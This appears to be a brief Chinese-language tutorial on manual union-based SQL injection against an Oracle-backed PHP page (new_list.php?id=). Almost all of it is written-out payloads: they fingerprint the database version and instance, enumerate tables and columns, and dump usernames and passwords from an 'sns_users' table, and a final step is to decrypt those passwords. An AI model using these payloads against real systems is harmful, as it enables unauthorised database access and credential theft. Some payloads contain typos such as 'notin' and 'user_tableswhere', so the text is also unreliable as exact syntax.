Oracle手工注入

1.判断注入点

2.用order by判断列数

3.用联合查询获取显错点

new_list.php?id=-1 union select 'null','null' from dual

4.查看版本信息

new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

5.查询当前数据库库名

new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual

6查询数据库表名

new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name notin'LOGMNR_GLOBAL$') from dual

new_list.php?id=-1 union select 'null',(select table_name from user_tableswhere rownum=1) from dual

7.查询数据库列名

new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual

new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name<> 'USER_NAME') from dual

8.获取账号密码字段内容

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

9.对密码进行解密